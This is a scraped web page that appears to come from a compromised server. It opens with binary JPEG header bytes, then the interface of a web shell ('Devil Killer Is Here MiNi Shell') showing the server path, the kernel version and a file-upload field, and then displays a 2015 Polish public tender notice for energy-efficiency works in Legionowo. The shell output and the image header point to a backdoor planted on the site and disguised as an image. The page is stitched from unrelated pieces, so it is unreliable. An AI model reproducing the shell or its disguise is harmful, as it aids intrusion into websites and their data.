JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150429/61181-N-2015.html

<p class="kh_header"><b>Legionowo: Zwiększenie efektywności energetycznej budynku Powiatowego Zespołu Szkół Ponadgimnazjalnych w Legionowie oraz Zwiększenie efektywności energetycznej budynku Domu Pomocy Społecznej Kombatant w Legionowie.</b><br>
<b>Numer ogłoszenia: 61181 - 2015; data zamieszczenia: 29.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Legionowski , ul. gen. Władysława Sikorskiego 11, 05-119 Legionowo, woj. mazowieckie, tel. 22 7840872, faks 22 7742551.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-legionowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zwiększenie efektywności energetycznej budynku Powiatowego Zespołu Szkół Ponadgimnazjalnych w Legionowie oraz Zwiększenie efektywności energetycznej budynku Domu Pomocy Społecznej Kombatant w Legionowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zaprojektowanie i wykonanie robót budowlanych (formuła realizacji projektuj i buduj), polegających na Zwiększeniu efektywności energetycznej budynku Powiatowego Zespołu Szkół Ponadgimnazjalnych w Legionowie oraz Zwiększeniu efektywności energetycznej Domu Pomocy Społecznej Kombatant w Legionowie. Zamawiający dopuszcza składanie ofert częściowych. Przedmiot zamówienia składa się z dwóch zadań: Zadanie I: Zwiększenie efektywności energetycznej budynku Powiatowego Zespołu Szkół Ponadgimnazjalnych w Legionowie. Przedmiotem zamówienia w ramach zadania I jest zaprojektowanie i wykonanie robót budowlanych, na podstawie załącznika nr 10 - Program Funkcjonalno-Użytkowy (PFU). W zakres zadania I wchodzą w szczególności: - uzyskanie niezbędnych do opracowania kompletnych projektów budowlanych warunków, map i decyzji administracyjnych, - opracowanie niezbędnych projektów budowlanych w zakresie wymaganym do uzyskania pozwolenia na budowę, - uzyskanie niezbędnych do realizacji robót decyzji administracyjnych, w tym m. in. pozwolenia na budowę, - opracowanie niezbędnych projektów wykonawczych i rysunków warsztatowych (w miarę potrzeb), - wykonanie termomodernizacji o łącznej powierzchni ok. 2000 m2, - wykonanie modernizacji kotłowni poprzez wymianę kotłów grzewczych o mocy ok. 100 kW, - wymiana instalacji centralnego ogrzewania i ciepłej wody użytkowej, - budowa mikroinstalacji fotowoltaicznej na dachu budynku o mocy zainstalowanej nie mniejszej niż 5 kW, - budowa układu do kompensacji mocy biernej, - budowa układu sterowania za pomocą prognozy pogody, - opracowanie dokumentacji powykonawczych, - pełnienie nadzoru autorskiego. Zadanie II: Zwiększenie efektywności energetycznej budynku Domu Pomocy Społecznej Kombatant w Legionowie. Przedmiotem zamówienia w ramach zadania II jest zaprojektowanie i wykonanie robót budowlanych, na podstawie załącznika nr 11 - Program Funkcjonalno-Użytkowy (PFU). W zakres zadania II wchodzą w szczególności: - uzyskanie niezbędnych do opracowania kompletnych projektów budowlanych warunków, map i decyzji administracyjnych, - opracowanie niezbędnych projektów budowlanych w zakresie wymaganym do uzyskania pozwolenia na budowę, - uzyskanie niezbędnych do realizacji robót decyzji administracyjnych, w tym m. in. pozwolenia na budowę, - opracowanie niezbędnych projektów wykonawczych i rysunków warsztatowych (w miarę potrzeb), - budowa systemu kogeneracyjnego o mocy znamionowej ok. 20 kWe/46 kWt wraz z niezbędną infrastrukturą sanitarną i elektroenergetyczną, - budowa mikroinstalacji fotowoltaicznej na dachu budynku o mocy zainstalowanej nie mniejszej niż 30 kW, - budowa stacji transformatorowej 15/0,4 kV, - wymiana kotłów grzewczych o mocy ok. 600 kW, - wymiana głowic termostatycznych, - modernizacja instalacji c.w.u. poprzez montaż perlatorów, - budowa układu sterowania za pomocą prognozy pogody, - opracowanie dokumentacji powykonawczej, - pełnienie nadzoru autorskiego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7, 45.22.31.10-0, 45.30.00.00-0, 45.31.00.00-3, 45.31.57.00-5, 45.33.10.00-6, 45.33.30.00-0, 45.25.12.20-9, 45.32.10.00-3, 45.42.10.00-4, 09.33.12.00-0, 51.90.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w łącznej wysokości 135.000,00 zł (słownie: sto trzydzieści pięć tysięcy 00/100 złotych), w tym: - 60.000,00 zł (słownie: sześćdziesiąt tysięcy złotych) - za Zadanie I, - 75.000,00 zł (słownie: siedemdziesiąt pięć tysięcy złotych) - za zadanie II, w formach określonych w art. 45 ust. 6 Ustawy, na cały okres związania ofertą. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek Zamawiającego: Bank Spółdzielczy w Legionowie - nr konta 92 8013 0006 2001 0000 2424 0008. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli przed terminem składania ofert znajdzie się na rachunku bankowym Zamawiającego. W przypadku wyboru formy niepieniężnej wadium, oryginał dokumentu należy złożyć w siedzibie Zamawiającego, pokój nr 510 lub 511 na V piętrze, przed terminem składania ofert. Do oferty należy dołączyć kopię dokumentu. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. Do oferty należy dołączyć potwierdzenie polecenia przelewu wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Potwierdzeniem spełnienia tego warunku będzie oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia będzie uważany za spełniony, jeżeli: a) Wykonawca wykaże w okresie ostatnich 3-ch lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonanie przez Wykonawcę: w przypadku składania oferty na realizację tylko zadania I: - minimum jednej usługi, polegającej na zaprojektowaniu instalacji fotowoltaicznej o mocy elektrycznej nie niższej niż 3 kWp; w przypadku składania oferty na realizację tylko zadania II lub łącznie zadania I i II: - minimum jednej usługi, polegającej na zaprojektowaniu instalacji fotowoltaicznej o mocy elektrycznej nie niższej niż 20 kWp, - minimum jednej usługi, polegającej na zaprojektowaniu instalacji kogeneracyjnej o mocy elektrycznej nie niższej niż 20 kWe. b) Wykonawca wykaże w okresie ostatnich 5-ciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonanie przez Wykonawcę: w przypadku składania oferty na realizację tylko zadania I: - minimum jednego zadania, polegającego na wykonaniu robót termomodernizacyjnych o wartości nie mniejszej niż 1.000.000,- zł brutto, - minimum jednego zadania, polegającego na wykonaniu instalacji fotowoltaicznej o mocy elektrycznej nie niższej niż 3 kWp, - minimum jednego zadania, polegającego na wykonaniu instalacji systemu automatycznej regulacji ogrzewania, działającego na podstawie bieżącej prognozy pogody; w przypadku składania oferty na realizację tylko zadania II: - minimum jednego zadania, polegającego na wykonaniu robót ogólnobudowlanych o wartości nie mniejszej niż 1.000.000,- zł brutto, - minimum jednego zadania, polegającego na montażu i uruchomieniu jednostki kogeneracyjnej o mocy elektrycznej nie niższej niż 20 kW, - minimum jednego zadania, polegającego na wykonaniu instalacji fotowoltaicznej o mocy elektrycznej nie niższej niż 20 kWp, - minimum jednego zadania, polegającego na wykonaniu instalacji systemu automatycznej regulacji ogrzewania, działającego na podstawie bieżącej prognozy pogody; w przypadku składania oferty na realizację łącznie zadania I i II: - minimum jednego zadania, polegającego na wykonaniu robót termomodernizacyjnych o wartości nie mniejszej niż 1.000.000,- zł brutto, - minimum jednego zadania, polegającego na wykonaniu robót ogólnobudowlanych o wartości nie mniejszej niż 1.000.000,- zł brutto, - minimum jednego zadania, polegającego na montażu i uruchomieniu jednostki kogeneracyjnej o mocy elektrycznej nie niższej niż 20 kW, - minimum jednego zadania, polegającego na wykonaniu instalacji fotowoltaicznej o mocy elektrycznej nie niższej niż 20 kWp, - minimum jednego zadania, polegającego na wykonaniu instalacji systemu automatycznej regulacji ogrzewania, działającego na podstawie bieżącej prognozy pogody.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Potwierdzeniem spełnienia tego warunku będzie oświadczenie Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia: Warunek dysponowania osobami zdolnymi do wykonania zamówienia (które będą uczestniczyć w wykonaniu zamówienia), zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż dysponuje, dla każdego zadania osobno, osobami posiadającymi: 1. 1 osoba na stanowisku Kierownika Budowy - uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do kierowania robotami bez ograniczeń (zgodnie z rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie, Dz. U. 2014, poz. 1278) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów; oraz aktualne zaświadczenie o przynależności do właściwej izby samorządu zawodowego; 2. 1 osoba na stanowisku Kierownika Robót Elektrycznych - uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych do kierowania robotami bez ograniczeń (zgodnie z rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie, Dz. U. 2014, poz. 1278) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów oraz aktualne zaświadczenie o przynależności do właściwej izby samorządu zawodowego, 3. 1 osoba na stanowisku Kierownika Robót Sanitarnych - uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych do kierowania robotami bez ograniczeń (zgodnie z rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie, Dz. U. 2014, poz. 1278) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów oraz aktualne zaświadczenie o przynależności do właściwej izby samorządu zawodowego, 4. 1 osoba na stanowisku Projektanta Elektrycznego - uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych do projektowania bez ograniczeń (zgodnie z rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie, Dz. U. 2014, poz. 1278) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów; aktualne zaświadczenie o przynależności do właściwej izby samorządu zawodowego; 5. 1 osoba na stanowisku Projektanta Sanitarnego - uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych do projektowania bez ograniczeń (zgodnie z rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie, Dz. U. 2014, poz. 1278) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów; aktualne zaświadczenie o przynależności do właściwej izby samorządu zawodowego; 6. 1 osoba na stanowisku Projektanta Ogólnobudowlanego - uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do projektowania bez ograniczeń (zgodnie z rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie, Dz. U. 2014, poz. 1278) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów; aktualne zaświadczenie o przynależności do właściwej izby samorządu zawodowego; 7. 1 osoba na stanowisku Projektanta Architekta - uprawnienia budowlane w specjalności architektonicznej do projektowania bez ograniczeń (zgodnie z rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie, Dz. U. 2014, poz. 1278) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów; aktualne zaświadczenie o przynależności do właściwej izby samorządu zawodowego; lub dysponowania osobami wymienionymi w pkt. 1-7 posiadającymi dokumenty stanowiące podstawę do wykonywania samodzielnych funkcji technicznych w budownictwie, wydane zgodnie z ustawą z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394). Uwaga: Zamawiający wymaga spełnienia powyższego warunku dla każdego zadania osobno. Zamawiający dopuszcza wskazanie jednej osoby do pełnienia dwóch funkcji w ramach realizacji jednego zadania. W przypadku składania przez Wykonawcę oferty na realizację obu zadań łącznie, Zamawiający nie dopuszcza wskazania jednej osoby do równoczesnego pełnienia jakichkolwiek funkcji przy realizacji obu zadań. Dla każdej z w/w osób należy przedstawić opis posiadanego doświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek bycia w odpowiedniej sytuacji ekonomicznej i finansowej będzie uważany za spełniony jeżeli wykonawca wykaże, iż: a) posiada opłacone (dołączony dowód opłaty składki/składek ubezpieczenia) ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż: - 750.000,00 zł (siedemset pięćdziesiąt tysięcy złotych) - dla Zadania I, - 750.000,00 zł (siedemset pięćdziesiąt tysięcy złotych) - dla Zadania II. W przypadku składania przez Wykonawcę oferty na oba zadania łącznie w/w warunek będzie uważany za spełniony jeżeli wykonawca wykaże, iż posiada opłacone (dołączony dowód opłaty składki/składek ubezpieczenia) ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 1.500.000,00 zł (jeden milion pięćset tysięcy złotych). b) posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż: - 800.000,00 zł (osiemset tysięcy złotych) - dla Zadania I, - 1.200.000,00 zł (jeden milion dwieście tysięcy złotych) - dla Zadania II. W przypadku składania przez Wykonawcę oferty na oba zadania łącznie w/w warunek będzie uważany za spełniony jeżeli wykonawca wykaże, iż posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 2.000.000,00 zł (dwa miliony złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający żąda wykazania przez Wykonawcę w wykazie robót budowlanych wykonania: w przypadku składania oferty na realizację tylko zadania I: - minimum jednego zadania, polegającego na wykonaniu robót termomodernizacyjnych o wartości nie mniejszej niż 1.000.000,- zł brutto, - minimum jednego zadania, polegającego na wykonaniu instalacji fotowoltaicznej o mocy elektrycznej nie niższej niż 3 kWp, - minimum jednego zadania, polegającego na wykonaniu instalacji systemu automatycznej regulacji ogrzewania, działającego na podstawie bieżącej prognozy pogody; w przypadku składania oferty na realizację tylko zadania II: - minimum jednego zadania, polegającego na wykonaniu robót ogólnobudowlanych o wartości nie mniejszej niż 1.000.000,- zł brutto, - minimum jednego zadania, polegającego na montażu i uruchomieniu jednostki kogeneracyjnej o mocy elektrycznej nie niższej niż 20 kW, - minimum jednego zadania, polegającego na wykonaniu instalacji fotowoltaicznej o mocy elektrycznej nie niższej niż 20 kWp, - minimum jednego zadania, polegającego na wykonaniu instalacji systemu automatycznej regulacji ogrzewania, działającego na podstawie bieżącej prognozy pogody; w przypadku składania oferty na realizację łącznie zadania I i II: - minimum jednego zadania, polegającego na wykonaniu robót termomodernizacyjnych o wartości nie mniejszej niż 1.000.000,- zł brutto, - minimum jednego zadania, polegającego na wykonaniu robót ogólnobudowlanych o wartości nie mniejszej niż 1.000.000,- zł brutto, - minimum jednego zadania, polegającego na montażu i uruchomieniu jednostki kogeneracyjnej o mocy elektrycznej nie niższej niż 20 kW, - minimum jednego zadania, polegającego na wykonaniu instalacji fotowoltaicznej o mocy elektrycznej nie niższej niż 20 kWp, - minimum jednego zadania, polegającego na wykonaniu instalacji systemu automatycznej regulacji ogrzewania, działającego na podstawie bieżącej prognozy pogody.;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający żąda wykazania przez Wykonawcę w wykazie usług wykonania: w przypadku składania oferty na realizację tylko zadania I: - minimum jednej usługi, polegającej na zaprojektowaniu instalacji fotowoltaicznej o mocy elektrycznej nie niższej niż 3 kWp; w przypadku składania oferty na realizację tylko zadania II lub łącznie zadania I i II: - minimum jednej usługi, polegającej na zaprojektowaniu instalacji fotowoltaicznej o mocy elektrycznej nie niższej niż 20 kWp, - minimum jednej usługi, polegającej na zaprojektowaniu instalacji kogeneracyjnej o mocy elektrycznej nie niższej niż 20 kWe.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

